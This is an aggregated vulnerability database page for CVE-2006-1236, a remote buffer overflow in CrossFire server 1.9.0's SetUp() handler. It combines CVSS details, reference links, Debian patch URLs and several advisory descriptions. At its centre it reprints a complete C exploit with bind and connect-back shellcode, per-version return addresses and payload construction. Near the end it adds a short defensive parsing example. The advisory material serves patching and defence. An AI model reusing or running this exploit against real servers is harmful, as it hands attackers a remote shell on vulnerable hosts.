CVE-2006-1236
CVSS 7.5
Published: 2006-03-14 19:02:00
Revised: 2011-03-07 21:32:30

[Original] Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.


[CNNVD] CrossFire 'socket/request.c' Buffer Overflow Vulnerability (CNNVD-200603-261)

        A buffer overflow exists in the SetUp function in socket/request.c of CrossFire 1.9.0. A remote attacker can execute arbitrary code via a long setup sound command. This is a different vulnerability from CVE-2006-1010.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may be degraded or access to resources interrupted]
Attack complexity: LOW [exploitation is not access-restricted]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available.

- OVAL (technical details for detection)

No related OVAL definitions were found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1236
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1236
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-261
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/0951
(UNKNOWN)  VUPEN  ADV-2006-0951
http://www.securityfocus.com/bid/17093
(UNKNOWN)  BID  17093
http://www.milw0rm.com/exploits/1582
(UNKNOWN)  MILW0RM  1582
http://secunia.com/advisories/19237
(VENDOR_ADVISORY)  SECUNIA  19237
http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log
(UNKNOWN)  CONFIRM  http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log
http://xforce.iss.net/xforce/xfdb/25252
(UNKNOWN)  XF  crossfire-setup-bo(25252)
http://www.osvdb.org/23904
(UNKNOWN)  OSVDB  23904
http://www.debian.org/security/2006/dsa-1009
(UNKNOWN)  DEBIAN  DSA-1009
http://secunia.com/advisories/19276
(UNKNOWN)  SECUNIA  19276

- Vulnerability information

CrossFire 'socket/request.c' Buffer Overflow Vulnerability
High severity  Buffer overflow
2006-03-14 00:00:00 2006-03-17 00:00:00
Remote
        A buffer overflow exists in the SetUp function in socket/request.c of CrossFire 1.9.0. A remote attacker can execute arbitrary code via a long setup sound command. This is a different vulnerability from CVE-2006-1010.

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue. Patch download links:
        Crossfire Crossfire 1.1
        Debian crossfire-doc_1.1.0-1woody2_all.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-doc_1.1.0-1woody2_all.deb
        Debian crossfire-edit_1.1.0-1woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_alpha.deb
        Debian crossfire-edit_1.1.0-1woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_arm.deb
        Debian crossfire-edit_1.1.0-1woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_hppa.deb
        Debian crossfire-edit_1.1.0-1woody2_i386.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_i386.deb
        Debian crossfire-edit_1.1.0-1woody2_ia64.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_ia64.deb
        Debian crossfire-edit_1.1.0-1woody2_m68k.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_m68k.deb
        Debian crossfire-edit_1.1.0-1woody2_mips.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_mips.deb
        Debian crossfire-edit_1.1.0-1woody2_mipsel.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_mipsel.deb
        Debian crossfire-edit_1.1.0-1woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_powerpc.deb
        Debian crossfire-edit_1.1.0-1woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_s390.deb
        Debian crossfire-edit_1.1.0-1woody2_sparc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_sparc.deb
        Debian crossfire-server_1.1.0-1woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_alpha.deb
        Debian crossfire-server_1.1.0-1woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_arm.deb
        Debian crossfire-server_1.1.0-1woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_hppa.deb
        Debian crossfire-server_1.1.0-1woody2_i386.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_i386.deb
        Debian crossfire-server_1.1.0-1woody2_ia64.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_ia64.deb
        Debian crossfire-server_1.1.0-1woody2_m68k.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_m68k.deb
        Debian crossfire-server_1.1.0-1woody2_mips.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_mips.deb
        Debian crossfire-server_1.1.0-1woody2_mipsel.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_mipsel.deb
        Debian crossfire-server_1.1.0-1woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_powerpc.deb
        Debian crossfire-server_1.1.0-1woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_s390.deb
        Debian crossfire-server_1.1.0-1woody2_sparc.deb
        Debian GNU/Linux 3.0 alias woody
        htt

- Vulnerability information (1582)

crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit (EDBID:1582)
linux remote
2006-03-13 Verified
13327 landser
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host

unsigned char sc_cb[] = // izik's
	"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
	"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
	"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
	"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
	"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";

unsigned char sc_bind[] = // izik's
	"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
	"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
	"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
	"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
	"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
	"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
	"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";

struct {
	const char *type;
	unsigned char *code;
} shellcodes[] = {
	{"bind",		sc_bind},
	{"connectback",		sc_cb},
};

struct {
	const char *ver;
	unsigned long ret; // a "jmp *%eax" instruction
	unsigned short int len;
} targets[] = {
	{"crossfire-server_1.6.0.dfsg.1-4_i386.deb",	0x080d6f48, 0x1028},
	{"crossfire-server_1.8.0-2_i386.deb",		0x080506d7, 0x1130},
	{"crossfire-server_1.9.0-1_i386.deb",		0x0807aefa, 0x1130},
	{"crash",					0xcccccccc, 0x1300},
};

#define structsize(x) (sizeof x / sizeof x[0])

int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];

void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);

int main (int argc, char **argv) {
	int port = 0; // default value
	unsigned short int sc_port = 0;
	char *sc_host = NULL;

	printf("cf190.c by landser - ihsahn at gmail com\n\n");

	char c;
	while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
		switch (c) {
			case 's': sc = shellcodes[atoi(optarg)].code; break;
			case 'h': sc_host = strdup(optarg); break;
			case 'd': sc_port = atoi(optarg); break;
			case 't': n = atoi(optarg); break;
			case 'p': port = atoi(optarg); break;
			case '?': usage(argv[0]); return EXIT_FAILURE;
		}
	}

	if ((n < 0) || (n >= structsize(targets))) {
		printf("invalid target\n");
		usage(argv[0]);
		return EXIT_FAILURE;
	}
	
	if ((optind + 1) != argc) {
		printf("no hostname\n");
		usage(argv[0]);
		return EXIT_FAILURE;
	}

	establish(argv[optind], port ? port : PORT);
	
	update(sc, sc_port, sc_host);
       
	writebuf();

	printf("> sending\n");

	if (send(s, buf, targets[n].len + 2, 0) < 0) {
		perror("send()");
		return EXIT_FAILURE;
	}
	usleep(100000);

	printf("> done\n");
	
	close(s);

	return EXIT_SUCCESS;
}

void establish (char *ip, int port) {
	struct sockaddr_in sa;
	struct hostent *h;

	if (!(h = gethostbyname(ip))) {
		herror("gethostbyname()");
		exit(EXIT_FAILURE);
	}
	printf("> resolved %s to %s\n", ip,
			inet_ntoa(**((struct in_addr **)h->h_addr_list)));
	
	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	sa.sin_addr = **((struct in_addr **)h->h_addr_list);
	
	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror("socket()");
		exit(EXIT_FAILURE);
	}

	if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
		perror("connect()");
		exit(EXIT_FAILURE);
	}

	printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}

void usage (char *argv0) {
	int i;
	
	printf("usage: %s -t <target> [-s <shellcode>] "
			"[-d <connectback/bind port] [-h <connectback ip>] "
			"host [-p <port>]\n", argv0);

	printf("- targets:\n");
	for (i=0;i<structsize(targets);i++)
		printf("%d. %s\n", i, targets[i].ver);

	printf("- shellcodes: (default 0)\n");
	for (i=0;i<structsize(shellcodes);i++)
		printf("%d. %s\n", i, shellcodes[i].type);
}

void update (unsigned char *code, int port, char *host) {
	if (!port) port = SC_PORT;
	
	if (!(port & 0xff) || !((port >> 8) & 0xff)) {
		printf("bad cb port\n");
		exit(EXIT_FAILURE);
	}
	*(unsigned short int *)(strstr(code, "PR")) = port;

	if (strstr(code, "HOST")) {
		in_addr_t inaddr;

		if (!host) host = SC_HOST;
		inaddr = inet_addr(host);
		
		if (inaddr == INADDR_NONE || strstr(host, "255")) {
			// ~(255) is 0
			printf("invalid cb hostname\n");
			exit(EXIT_FAILURE);
		}
		*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
	}
	
	if (host) free(host);
}
	
void writebuf (void) {
	unsigned char *ptr = buf;
	
	memset(buf, 0x90, sizeof buf);

	*ptr++ = (targets[n].len>> 8) & 0xff;
	*ptr++ = targets[n].len & 0xff;
	
	memcpy(ptr, "setup sound ", strlen("setup sound "));
	ptr += strlen("setup sound ");
	
	ptr += 120; // leave 120 nops before the shellcode
	memcpy(ptr, sc, strlen(sc));
	
	ptr = &buf[targets[n].len - 10];
	*(unsigned long *)ptr = targets[n].ret;
}

// milw0rm.com [2006-03-13]
		

- Vulnerability information

23904
CrossFire request.c SetUp() Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in CrossFire. CrossFire fails to properly handle boundary conditions within the SetUp() function in "request.c" when handling malicious content received in the "setup" command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
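A bounded handler for the setup command, added here as an illustration (this is not CrossFire's own SetUp() code; the 2-byte big-endian length framing and the size limits are assumptions read off the published exploit's writebuf()). The declared length, the option name and the value are each checked against fixed limits before any byte is copied, which is the boundary check the description above says SetUp() lacks.

```c
#include <stdint.h>
#include <string.h>
/* Assumed framing, read off the exploit's writebuf(): a 2-byte big-endian length,
 * then "setup <option> <value>". Added illustration, not CrossFire's own SetUp(). */
#define MAX_MSG 1024   /* assumed largest legitimate setup message */
#define MAX_OPT 32
#define MAX_VAL 64
enum setup_result { SETUP_OK, SETUP_BAD_FRAME, SETUP_TOO_LONG, SETUP_BAD_SYNTAX };
static char g_opt[MAX_OPT], g_val[MAX_VAL];   /* filled by the last successful parse */

/* Every length is validated before any copy, so the fixed-size buffers cannot overrun. */
enum setup_result parse_setup(const uint8_t *msg, size_t msglen, char *opt, char *val)
{
    static const char prefix[] = "setup ";
    if (msglen < 2) return SETUP_BAD_FRAME;
    size_t declared = ((size_t)msg[0] << 8) | msg[1];
    if (declared != msglen - 2) return SETUP_BAD_FRAME;   /* frame must match the bytes */
    if (declared > MAX_MSG) return SETUP_TOO_LONG;          /* reject before parsing */
    const char *p = (const char *)msg + 2, *end = p + declared;
    if (declared < sizeof prefix - 1 || memcmp(p, prefix, sizeof prefix - 1) != 0)
        return SETUP_BAD_SYNTAX;
    p += sizeof prefix - 1;
    const char *sp = memchr(p, ' ', (size_t)(end - p));
    if (sp == NULL) return SETUP_BAD_SYNTAX;
    size_t optlen = (size_t)(sp - p), vallen = (size_t)(end - sp - 1);
    if (optlen == 0 || optlen >= MAX_OPT || vallen >= MAX_VAL) return SETUP_TOO_LONG;
    memcpy(opt, p, optlen);      opt[optlen] = '\0';
    memcpy(val, sp + 1, vallen); val[vallen] = '\0';
    return SETUP_OK;
}

/* Frames a body with the assumed 2-byte length and runs the parser. */
enum setup_result check_body(const char *body, size_t bodylen)
{
    static uint8_t msg[2 + 0xFFFF];
    if (bodylen > 0xFFFF) return SETUP_BAD_FRAME;
    msg[0] = (uint8_t)(bodylen >> 8); msg[1] = (uint8_t)bodylen;
    memcpy(msg + 2, body, bodylen);
    return parse_setup(msg, bodylen + 2, g_opt, g_val);
}
enum setup_result check_text(const char *body) { return check_body(body, strlen(body)); }
/* Constructed input with the shape of the reported one: "setup sound " plus a long filler. */
enum setup_result check_long_sound(size_t fill)
{
    static char body[0x2000];
    const size_t n = strlen("setup sound ");
    if (n + fill > sizeof body) return SETUP_BAD_FRAME;
    memcpy(body, "setup sound ", n);
    memset(body + n, 'A', fill);
    return check_body(body, n + fill);
}
```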

- Timeline

2006-03-13 Unknown
2006-03-13 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Crossfire has released a patch to address this vulnerability. Upgrade the "request.c" file to at least version 1.86.

- References

- Vulnerability author

- Vulnerability information

CrossFire SetUp Remote Buffer Overflow Vulnerability
Boundary Condition Error 17093
Yes No
2006-03-13 12:00:00 2006-12-13 04:23:00
Reported by landser <ihsahn at gmail com>.

- Affected software versions

Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Crossfire Crossfire 1.9
Crossfire Crossfire 1.8
Crossfire Crossfire 1.6
Crossfire Crossfire 1.1

- Vulnerability discussion

CrossFire is prone to a remote buffer-overflow vulnerability. This can facilitate a remote compromise due to arbitrary code execution.

CrossFire 1.9.0 and prior versions are vulnerable.

- Exploit

Sample exploit code has been provided:

- Solution


Please see referenced vendor advisories for more information and fixes.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com


Crossfire Crossfire 1.1

Crossfire Crossfire 1.6

- References
